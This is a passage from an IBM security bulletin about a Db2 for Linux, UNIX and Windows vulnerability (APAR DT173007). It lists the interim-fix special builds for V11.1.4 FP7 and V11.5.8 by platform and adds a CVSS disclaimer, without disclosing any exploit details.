Customers running any vulnerable fixpack level of an affected Program,  v11.1 and V11.5, can download the special build containing the interim fix for this issue from Fix Central. These special builds are available based on the most recent fixpack level for each impacted release:  V11.1.4 FP7, and V11.5.8. They can be applied to any affected fixpack level of the appropriate release to remediate this vulnerability.

**Release**

**Fixed in fix pack**

**APAR**

**Download URL**

V11.1

TBD

DT173007

Special Build for V11.1.4 FP7:

AIX 64-bit  
Linux 32-bit, x86-32  
Linux 64-bit, x86-64  
Linux 64-bit, POWER™ little endian  
Linux 64-bit, System z®, System z9® or zSeries®  
Solaris 64-bit, SPARC  
Windows 32-bit, x86  
Windows 64-bit, x86

V11.5

TBD

DT173007

Special Build for V11.5.8:

AIX 64-bit  
Linux 32-bit, x86-32  
Linux 64-bit, x86-64  
Linux 64-bit, POWER™ little endian  
Linux 64-bit, System z®, System z9® or zSeries®  
Windows 32-bit, x86  
Windows 64-bit, x86

IBM does not disclose key Db2 functionality nor replication steps for a vulnerability to avoid providing too much information to any potential malicious attacker. IBM does not want to enable a malicious attacker with sufficient knowledge to craft an exploit of the vulnerability.

**Workarounds and Mitigations**

None

**References**

Off

**Change History**

08 Feb 2023: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU058","label":"IBM Infrastructure w\\/TPS"},"Product":{"code":"SSEPGG","label":"Db2 for Linux, UNIX and Windows"},"Component":"","Platform":\[{"code":"PF016","label":"Linux"},{"code":"PF010","label":"HP-UX"},{"code":"PF002","label":"AIX"},{"code":"PF027","label":"Solaris"},{"code":"PF033","label":"Windows"}\],"Version":"11.1, 11.5","Edition":"","Line of Business":{"code":"LOB10","label":"Data and AI"}}\]

Tag

#windows